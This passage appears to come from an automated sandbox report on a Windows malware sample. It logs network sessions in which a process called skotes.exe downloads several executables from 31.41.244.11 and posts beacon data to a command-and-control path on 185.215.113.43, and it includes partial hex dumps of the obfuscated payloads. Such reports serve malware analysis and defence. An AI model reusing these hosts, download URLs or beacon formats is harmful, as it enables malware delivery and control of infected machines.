                                                                                                                                                                                                                                        Data Raw: 36 33 31 0d 0a 20 3c 63 3e 31 30 31 37 33 31 39 30 30 31 2b 2b 2b 62 35 39 33 37 63 31 61 39 39 64 35 66 39 64 66 30 62 35 64 61 66 63 38 35 30 36 32 33 38 34 37 36 30 61 63 30 32 62 34 64 65 64 38 61 62 65 65 65 31 66 62 39 61 32 64 63 62 31 32 31 65 65 37 30 36 62 31 31 64 31 35 30 33 34 66 38 64 64 38 63 32 32 62 62 34 62 34 39 61 35 35 33 36 65 36 23 31 30 31 37 33 32 31 30 30 31 2b 2b 2b 62 35 39 33 37 63 31 61 39 39 64 35 66 39 64 66 30 62 35 64 61 66 63 38 35 30 36 32 33 38 34 37 36 30 61 63 30 32 62 34 64 65 64 38 61 62 65 65 65 31 66 62 39 61 32 64 63 62 31 32 31 65 65 37 30 36 62 31 31 64 31 35 30 33 35 65 38 32 38 34 64 65 31 63 61 62 39 64 39 61 35 35 33 36 65 36 23 31 30 31 37 33 35 31 30 30 31 2b 2b 2b 62 35 39 33 37 63 31 61 39 39 64 35 66 39 64 66 30 62 35 64 61 66 63 38 35 30 36 32 33 38 34 37 36 30 61 63 30 32 62 34 64 65 64 38 61 62 65 65 65 31 66 62 63 37 37 30 39 65 35 62 30 33 61 63 35 32 65 61 34 38 34 62 34 31 31 62 39 64 63 34 65 31 23 31 30 31 37 33 35 32 30 30 31 2b 2b 2b [TRUNCATED]
                                                                                                                                                                                                                                        Data Ascii: 631 <c>1017319001+++b5937c1a99d5f9df0b5dafc85062384760ac02b4ded8abeee1fb9a2dcb121ee706b11d15034f8dd8c22bb4b49a5536e6#1017321001+++b5937c1a99d5f9df0b5dafc85062384760ac02b4ded8abeee1fb9a2dcb121ee706b11d15035e8284de1cab9d9a5536e6#1017351001+++b5937c1a99d5f9df0b5dafc85062384760ac02b4ded8abeee1fbc7709e5b03ac52ea484b411b9dc4e1#1017352001+++b5937c1a99d5f9df0b5dafc85062384760ac02b4ded8abeee1fbde719b5059bb00ab5e45425197d1aa1daaa8#1017353001+++b5937c1a99d5f9df0b5dafc85062384760ac02b4ded8abeee1fbc96a805145b002ab5e45425197d1aa1daaa8#1017354001+++b5937c1a99d5f9df0b5dafc85062384760ac02b4ded8abeee1fbcf70964e03ac52ea484b411b9dc4e1#1017355001+++b5937c1a99d5f9df0b5dafc85062384760ac02b4ded8abeee1fbd32c86444db31cf64d4a485a9592e100b7#1017356001+++b5937c1a99d5f9df0b5dafc85062384760ac02b4ded8abeee1fbde719b5059bb02ab5e45425197d1aa1daaa8#1017357001+++fc8f7c1ed3c0f9c30b4baed74c61395d7fac00b58987e8e7e7b9ca30804042ba5ce902415450#1017358001+++fc8f7c1ed3c0f9c30b4baed74c61395d7fac00b58987e8f8e6b1ca72dd534db057eb410a494d9d#101 [TRUNCATED]
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:09.829545021 CET124INData Raw: 63 30 30 62 35 38 39 38 37 65 38 66 63 66 37 62 38 63 37 33 30 38 30 34 30 34 32 62 61 35 63 65 39 30 32 34 31 35 34 35 30 23 31 30 31 37 33 36 30 30 30 31 2b 2b 2b 66 63 38 66 37 63 31 65 64 33 63 30 66 39 63 33 30 62 34 62 61 65 64 37 34 63 36
                                                                                                                                                                                                                                        Data Ascii: c00b58987e8fcf7b8c730804042ba5ce902415450#1017360001+++fc8f7c1ed3c0f9c30b4baed74c61395d7fac00b58987e8e4f4b2846d934f48b15eaa4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:10.063214064 CET416INData Raw: 39 35 63 34 39 23 31 30 31 37 33 36 31 30 30 31 2b 2b 2b 62 35 39 33 37 63 31 61 39 39 64 35 66 39 64 66 30 62 35 64 61 66 63 38 35 30 36 32 33 38 34 37 36 30 61 63 30 32 62 34 64 65 64 38 61 62 65 65 65 31 66 62 63 64 37 65 38 36 34 34 30 33 61
                                                                                                                                                                                                                                        Data Ascii: 95c49#1017361001+++b5937c1a99d5f9df0b5dafc85062384760ac02b4ded8abeee1fbcd7e864403ac52ea484b411b9dc4e1#1017362001+++b5937c1a99d5f9df0b5dafc85062384760ac02b4ded8abeee1fbc7709c4543b01cf64d4a485a9592e100b7#1017363001+++b5937c1a99d5f9df0b5dafc85062


                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                        2192.168.2.44976331.41.244.11807832C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:10.187891960 CET66OUTGET /files/1293295511/zudFSfy.exe HTTP/1.1
                                                                                                                                                                                                                                        Host: 31.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:11.524941921 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                        Date: Thu, 19 Dec 2024 05:09:11 GMT
                                                                                                                                                                                                                                        Content-Type: application/octet-stream
                                                                                                                                                                                                                                        Content-Length: 1114112
                                                                                                                                                                                                                                        Last-Modified: Thu, 19 Dec 2024 03:43:46 GMT
                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                        ETag: "67639672-110000"
                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                        Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 24 95 63 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 30 00 00 cc 10 00 00 32 00 00 00 00 00 00 ee ea 10 00 00 20 00 00 00 00 11 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 60 11 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 94 ea 10 00 57 00 00 00 00 00 11 00 48 2f 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 11 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED]
                                                                                                                                                                                                                                        Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL$cg02 @ `@WH/@ H.text `.rsrcH/0@@.reloc@@BH<K`pY?F60584zc:VN01O*S~IpRiIPn}iJ!BH+o/Syj8T'}yIkD'$6}w[ )j[-0|ph\LRT~bKh"8s`)1 [i&9a?FN~_^Q43L@vxIB4|(~YLS;x)wv:2y%{3w)^7@7k
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:11.525006056 CET224INData Raw: c5 aa 48 9b ae 70 7d f1 84 22 02 e3 af 25 ff 70 0b a7 0d f0 30 e9 b8 67 c4 33 a1 c7 f4 e2 67 07 b9 1d 13 d5 b0 15 b7 9a 9c f0 4c 20 85 a8 02 8b 95 86 b3 8e 7d 65 ab 63 4d 56 2e 77 fb 94 14 cb 5e 76 61 bc 07 61 d8 0e 44 fa a3 52 50 b7 c7 84 0f 72
                                                                                                                                                                                                                                        Data Ascii: Hp}"%p0g3gL }ecMV.w^vaaDRPr|>CNbYluH#61Z:';)5q2}KK'Rm!a;ijxL8MMWYbp{,mgT%
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:11.525037050 CET1236INData Raw: 03 9a 99 28 de 39 c1 02 3c 9f 5f 07 7b 3b b2 00 b7 ae d7 74 6f 85 80 52 4f 1f 65 f3 11 d5 ea aa cb 37 b8 97 99 bd 98 59 d6 b2 7d 58 2f 03 43 c3 c0 83 99 4e 37 53 11 b3 a4 15 45 24 c0 eb f4 28 0a f6 b8 1d 22 b0 9e 28 a5 23 9f b0 3d 01 06 1a fd 14
                                                                                                                                                                                                                                        Data Ascii: (9<_{;toROe7Y}X/CN7SE$("(#=E@pw9RoyorX]i#-da,WQgn1ttuOG_gyf=O'\@&e:NJMqxC(R9VobP#k
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:11.525105953 CET1236INData Raw: 00 00 0a 13 04 06 6f 10 00 00 0a 1f 0d 6a 59 13 05 07 06 11 04 11 05 09 6f 1a 00 00 06 2a 00 00 00 13 30 07 00 e8 04 00 00 03 00 00 11 20 80 01 00 00 0a 20 80 01 00 00 8d 2c 00 00 01 25 d0 02 00 00 04 28 11 00 00 0a 0b 1f 10 8d 2c 00 00 01 0c 20
                                                                                                                                                                                                                                        Data Ascii: ojYo*0 ,%(, 79d : a%$^E${?P@ZW6Qv!_8
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:11.525139093 CET448INData Raw: 5d f2 34 5a 20 85 d8 21 a1 61 38 79 fb ff ff 11 06 1f 0d 11 06 1f 0d 95 08 1f 0d 95 61 9e 11 06 1f 0e 11 06 1f 0e 95 08 1f 0e 95 61 9e 11 0c 20 92 86 6d 1c 5a 20 ed a5 68 b5 61 38 48 fb ff ff 2a 13 30 08 00 a7 02 00 00 04 00 00 11 02 20 ff ba 88
                                                                                                                                                                                                                                        Data Ascii: ]4Z !a8yaa mZ ha8H*0 Z &a JGW 8a%^E0U;H8C~%X~%Xb`~%Xb`~%Xb`~%
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:11.525171995 CET1236INData Raw: 7e 01 00 00 04 02 11 06 16 11 04 1a 59 28 15 00 00 0a 11 07 20 35 b5 9d ba 5a 20 ab 4b 17 11 61 38 7c fe ff ff 17 8d 01 00 00 1b 0d 11 07 20 05 58 79 b0 5a 20 c8 f6 ac 6d 61 38 62 fe ff ff 7e 01 00 00 04 02 25 17 58 10 00 91 7e 01 00 00 04 02 25
                                                                                                                                                                                                                                        Data Ascii: ~Y( 5Z Ka8| XyZ ma8b~%X~%Xb`~%Xb`~%Xb`(~o( m9Z ia8nj. @%+ i_%& a&Za8b S@Z %a8 Q}
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:11.525207996 CET1236INData Raw: 97 0c 5a 20 99 8d e9 5d 61 38 3b ff ff ff 7e 01 00 00 04 02 25 17 58 10 00 91 7e 01 00 00 04 02 25 17 58 10 00 91 1e 62 60 7e 01 00 00 04 02 25 17 58 10 00 91 1f 10 62 60 7e 01 00 00 04 02 25 17 58 10 00 91 1f 18 62 60 13 05 11 07 20 15 0c 4f 7d
                                                                                                                                                                                                                                        Data Ascii: Z ]a8;~%X~%Xb`~%Xb`~%Xb` O}Z =a8(~o( <Z %&2a8 }Z ZHa8d Z a8nj3 :%+ U[%&8o~Y( =>
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:11.525242090 CET448INData Raw: 5a 61 38 7a fd ff ff 7e 01 00 00 04 02 25 17 58 10 00 91 7e 01 00 00 04 02 25 17 58 10 00 91 1e 62 60 7e 01 00 00 04 02 25 17 58 10 00 91 1f 10 62 60 7e 01 00 00 04 02 25 17 58 10 00 91 1f 18 62 60 0c 11 07 20 b4 27 69 ee 5a 20 31 e0 3e 4d 61 38
                                                                                                                                                                                                                                        Data Ascii: Za8z~%X~%Xb`~%Xb`~%Xb` 'iZ 1>Ma8+d bZ a8*0 wZ ad - Ota%^E5+eMz
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:11.525275946 CET1236INData Raw: 00 00 0a 11 07 20 77 4a cb a3 5a 20 a6 f9 29 74 61 38 c8 fe ff ff 06 6e 16 6a 2e 08 20 f3 db 99 66 25 2b 06 20 eb 44 23 69 25 26 38 ae fe ff ff 02 20 ff ff ff 3f 5f 10 00 11 07 20 e2 30 7b eb 5a 20 69 c4 ba 23 61 38 92 fe ff ff 06 6e 17 6a 2e 08
                                                                                                                                                                                                                                        Data Ascii: wJZ )ta8nj. f%+ D#i%&8 ?_ 0{Z i#a8nj. bH%+ ~\M%&8x~%X~%Xb`~%Xb`~%Xb` nZ a8)~%X~%Xb`~%Xb`~%Xb`
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:11.525310993 CET1236INData Raw: 20 1f 91 29 48 25 2b 06 20 a6 c7 a0 52 25 26 2b c2 07 17 59 0b 08 20 87 f1 40 8a 5a 20 da c4 75 01 61 2b af 06 17 62 02 7b 04 00 00 04 06 8f 02 00 00 02 03 28 0a 00 00 06 58 0a 20 25 bc 71 5f 2b 91 08 20 0a b5 00 85 5a 20 e3 cb 8d 74 61 2b 82 06
                                                                                                                                                                                                                                        Data Ascii: )H%+ R%&+Y @Z ua+b{(X %q_+ Z ta+{_bY*0 # a%^E0aJ+ vZ [bma+{(b Y+{2 {%+ -%&+X
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:11.644917965 CET1236INData Raw: 00 13 30 03 00 07 00 00 00 01 00 00 11 02 28 19 00 00 0a 2a 00 13 30 05 00 43 01 00 00 08 00 00 11 02 20 c0 00 00 00 8d 02 00 00 02 7d 09 00 00 04 02 20 c0 00 00 00 8d 02 00 00 02 7d 0a 00 00 04 02 1f 0c 8d 02 00 00 02 7d 0b 00 00 04 02 1f 0c 8d
                                                                                                                                                                                                                                        Data Ascii: 0(*0C } }}}}}s }s&}s2}r}}s}s }s}( W) Ia%^EJ


                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                        3192.168.2.449777185.215.113.43807832C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:15.969274998 CET184OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                        Host: 185.215.113.43
                                                                                                                                                                                                                                        Content-Length: 31
                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                        Data Raw: 64 31 3d 31 30 31 37 33 31 39 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39
                                                                                                                                                                                                                                        Data Ascii: d1=1017319001&unit=246122658369
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:18.929843903 CET193INHTTP/1.1 200 OK
                                                                                                                                                                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                        Date: Thu, 19 Dec 2024 05:09:18 GMT
                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                        Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                        Data Ascii: 4 <c>0


                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                        4192.168.2.44978731.41.244.11807832C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:19.053352118 CET66OUTGET /files/1293295511/kz8ZdyP.exe HTTP/1.1
                                                                                                                                                                                                                                        Host: 31.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:20.397093058 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                        Date: Thu, 19 Dec 2024 05:09:20 GMT
                                                                                                                                                                                                                                        Content-Type: application/octet-stream
                                                                                                                                                                                                                                        Content-Length: 1102336
                                                                                                                                                                                                                                        Last-Modified: Thu, 19 Dec 2024 03:48:32 GMT
                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                        ETag: "67639790-10d200"
                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                        Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 d0 96 63 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 30 00 00 9e 10 00 00 32 00 00 00 00 00 00 de bc 10 00 00 20 00 00 00 c0 10 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 20 11 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 8c bc 10 00 4f 00 00 00 00 c0 10 00 48 2f 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 11 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED]
                                                                                                                                                                                                                                        Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELcg02 @ @OH/ H.text `.rsrcH/0@@.reloc@BHKCW- B&n)T:.5G+GSQ0xO(pzLS;$Xli%)ZIXvS^i7:-r""955;)SaP^BKt?!' *kY4v$$Q-0!@?HM-a,?X0r,argMs#q/JOvg7h!xOc<stQ]i0g)dTQ"r2h7gdb@*$S}#tB|\@?cx8z\,JY?\k}ki?m>~i]pQQLyK
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:20.397133112 CET224INData Raw: 62 07 19 67 14 ba 38 e0 e3 a4 10 5f 8e ce cb fc 88 0a 8a c3 d8 ff f0 20 ca 54 9b a3 8d 16 09 74 c2 ab 94 c2 4f 9b cb bc b6 d3 a9 22 63 af 2e 0a 49 e0 bc 5f 36 fb 53 08 7e 24 71 23 4d ac e5 8e b3 da 4f ec 60 4e c7 b5 80 56 b4 09 71 60 c6 82 6b 25
                                                                                                                                                                                                                                        Data Ascii: bg8_ TtO"c.I_6S~$q#MO`NVq`k%}=W92)KXd(Z#UUGJ-AoS_R)lE44MOGa4rjB(-vOary6uIEH{"F$mv
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:20.397170067 CET1236INData Raw: 12 f9 91 51 58 af 04 23 8f 30 0c c7 39 30 18 6f 73 ac 17 7f 71 37 91 82 d9 62 45 1c ba b9 7a 77 52 9a da 97 10 44 58 9c d5 bd 05 a5 95 ef 6b a2 a9 d4 09 57 c5 50 f2 3a b8 1d 71 13 8b 05 a9 9a 1c ec 74 b6 d8 d8 89 0a 07 c9 67 95 d5 5e b6 aa 3f 88
                                                                                                                                                                                                                                        Data Ascii: QX#090osq7bEzwRDXkWP:qtg^?0>w_Y!j6i`>&NzD:jiDIQe,@PZY #8c_-b:POHW&e?6+Sx6\r;Ry5(9uR
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:20.397227049 CET1236INData Raw: fd fe ff ff 09 11 07 d2 6e 1e 11 06 5a 1f 3f 5f 62 60 0d 11 08 20 23 13 69 6e 5a 20 d8 58 93 dc 61 38 db fe ff ff 09 69 8d 2b 00 00 01 25 17 73 0f 00 00 0a 13 04 06 6f 10 00 00 0a 1f 0d 6a 59 13 05 07 06 11 04 11 05 09 6f 1a 00 00 06 2a 00 00 13
                                                                                                                                                                                                                                        Data Ascii: nZ?_b` #inZ Xa8i+%sojYo*0 ,%(, 5a%!^E!x"x#fAf
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:20.397264004 CET1236INData Raw: 18 64 d2 9c 08 11 0a 8f 2c 00 00 01 25 4b 11 0b 61 54 11 0a 17 58 13 0a 11 0c 20 cf ee 07 2a 5a 20 5e 23 07 aa 61 38 87 fb ff ff 2a 00 13 30 08 00 d2 02 00 00 04 00 00 11 02 20 c1 b5 26 63 5a 20 9d cb 0c 00 61 10 00 20 d4 c0 a4 87 20 53 62 41 fb
                                                                                                                                                                                                                                        Data Ascii: d,%KaTX *Z ^#a8*0 &cZ a SbAa%^E)@k:DT\n'8f~Y( Z Pa+ 5w]Z )@a8unj3 b%+ @o%&8[
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:20.397309065 CET672INData Raw: 62 60 13 05 d0 01 00 00 1b 28 16 00 00 0a 6f 17 00 00 0a 11 05 28 18 00 00 0a 13 06 11 07 20 8a a8 9f 65 5a 20 36 1b 2f 3f 61 38 2f fe ff ff 09 16 a3 01 00 00 1b 0b 11 07 20 4f 52 71 f5 5a 20 9e 4e 75 9c 61 38 14 fe ff ff 02 20 ff ff ff 3f 5f 10
                                                                                                                                                                                                                                        Data Ascii: b`(o( eZ 6/?a8/ ORqZ Nua8 ?_ uZ QSa8b xZ a8nj3 c%+ T%& k"0Za8~( Z U,a8~Y( $Z T
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:20.397344112 CET1236INData Raw: ff 3f 5f 10 00 11 07 20 04 e9 6d 24 5a 20 a6 73 de 92 61 38 72 fe ff ff 28 13 00 00 0a 7e 01 00 00 04 02 08 6f 14 00 00 0a 28 15 00 00 0a a5 01 00 00 1b 0b 11 07 20 c1 95 14 f6 5a 20 39 5a 7e 4b 61 38 43 fe ff ff d0 01 00 00 1b 28 16 00 00 0a 6f
                                                                                                                                                                                                                                        Data Ascii: ?_ m$Z sa8r(~o( Z 9Z~Ka8C(o(~Y( Z }!a8bnj. %+ pN%& !Za8nj. B%+ d/%&8~( YZ ==<a8
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:20.397381067 CET1236INData Raw: a3 01 00 00 1b 0b 11 07 20 60 cb 6b 4a 5a 20 54 73 01 f6 61 38 e0 fe ff ff 11 07 20 1c aa 47 87 5a 20 23 4d 73 2a 61 38 cd fe ff ff 02 1f 1e 64 0a 11 07 20 1d 9c 3d 9f 5a 20 19 bd 80 e7 61 38 b5 fe ff ff 06 6e 19 6a 2e 08 20 83 be db df 25 2b 06
                                                                                                                                                                                                                                        Data Ascii: `kJZ Tsa8 GZ #Ms*a8d =Z a8nj. %+ %&8nj3 :%+ <k%&8 2Z 5a8f iBZ a8L ?_bnj. )%+ +%& ?+Za8~%X~%X
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:20.397417068 CET1236INData Raw: 25 26 2b b3 06 17 62 02 7b 04 00 00 04 06 8f 02 00 00 02 03 28 0a 00 00 06 58 0a 20 4b 0d df 93 2b 95 07 17 59 0b 08 20 ec 35 67 fd 5a 20 b8 80 8c 50 61 2b 82 06 17 02 7b 05 00 00 04 1f 1f 5f 62 59 2a 00 00 13 30 06 00 bd 00 00 00 07 00 00 11 17
                                                                                                                                                                                                                                        Data Ascii: %&+b{(X K+Y 5gZ Pa+{_bY*0 *P <|*a%^ET/k8{( )@+ sZ oa+bX_b`X 2;(NZ 8qa+ Z zDa8i{
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:20.397452116 CET672INData Raw: 05 20 3c a3 ab 89 5a 20 f4 8d 52 fb 61 38 8f fe ff ff 11 05 20 55 7b 3b 02 5a 20 ad e8 94 37 61 38 7c fe ff ff 08 2a 00 00 13 30 03 00 07 00 00 00 01 00 00 11 02 28 19 00 00 0a 2a 00 13 30 05 00 56 01 00 00 08 00 00 11 02 20 c0 00 00 00 8d 02 00
                                                                                                                                                                                                                                        Data Ascii: <Z Ra8 U{;Z 7a8|*0(*0V } }}}}}s }s&}s2}r}}s}s }s
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:20.517183065 CET1236INData Raw: 77 c8 0d 17 5a 20 21 6d 22 0c 61 2b c4 02 06 17 59 7d 1a 00 00 04 07 20 0e af 43 5e 5a 20 10 bf b4 ea 61 2b ac 2a 00 00 00 13 30 05 00 f6 02 00 00 0a 00 00 11 02 7b 14 00 00 04 03 6f 10 00 00 06 20 a6 70 a0 91 20 f2 a9 59 c5 61 25 0d 1f 18 5e 45
                                                                                                                                                                                                                                        Data Ascii: wZ !m"a+Y} C^Z a+*0{o p Ya%^E-`Sy6*AQn8N4 %+ /#%&8r{( OZ fCla8


                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                        5192.168.2.449802185.215.113.43807832C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:25.018079996 CET184OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                        Host: 185.215.113.43
                                                                                                                                                                                                                                        Content-Length: 31
                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                        Data Raw: 64 31 3d 31 30 31 37 33 32 31 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39
                                                                                                                                                                                                                                        Data Ascii: d1=1017321001&unit=246122658369


                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                        6192.168.2.44982331.41.244.11807832C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:34.175954103 CET59OUTGET /files/lolz/random.exe HTTP/1.1
                                                                                                                                                                                                                                        Host: 31.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:35.499994993 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                        Date: Thu, 19 Dec 2024 05:09:35 GMT
                                                                                                                                                                                                                                        Content-Type: application/octet-stream
                                                                                                                                                                                                                                        Content-Length: 21504
                                                                                                                                                                                                                                        Last-Modified: Wed, 18 Dec 2024 18:13:28 GMT
                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                        ETag: "676310c8-5400"
                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                        Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 70 6d 3b c0 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 4a 00 00 00 08 00 00 00 00 00 00 3a 69 00 00 00 20 00 00 00 80 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 c0 00 00 00 02 00 00 00 00 00 00 03 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 e6 68 00 00 4f 00 00 00 00 80 00 00 9c 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a0 00 00 0c 00 00 00 54 68 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED]
                                                                                                                                                                                                                                        Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELpm;"0J:i @ `hOTh8 H.text@I J `.rsrcL@@.relocR@BiH6p108s2(}<}=};|<(+|<(*0P~,Brp(rcp((rp(((o(*08s,(}}}|(+|(*0Hs/+~~ioX-rp(+*0rp( o!+*0rp( o!+
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:35.500015020 CET224INData Raw: 00 06 2a 00 00 13 30 03 00 32 00 00 00 06 00 00 11 00 02 72 ef 00 00 70 72 f7 00 00 70 28 22 00 00 0a 6f 23 00 00 0a 0a 06 06 28 03 00 00 2b 28 04 00 00 2b 73 26 00 00 0a 28 27 00 00 0a 0b 2b 00 07 2a 00 00 1b 30 04 00 ad 00 00 00 07 00 00 11 00
                                                                                                                                                                                                                                        Data Ascii: *02rprp("o#(+(+s&('+*0s(rp( (+~%-&~s*%(+(+o-+@(.o/,%o0Xo1+o1(2
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:35.500021935 CET1236INData Raw: 00 00 0a 2d b7 de 0f 12 02 fe 16 04 00 00 1b 6f 33 00 00 0a 00 dc 06 13 07 2b 00 11 07 2a 00 00 00 01 10 00 00 02 00 49 00 4d 96 00 0f 00 00 00 00 13 30 03 00 65 00 00 00 08 00 00 11 00 02 72 d3 00 00 70 28 20 00 00 0a 28 05 00 00 2b 7e 0a 00 00
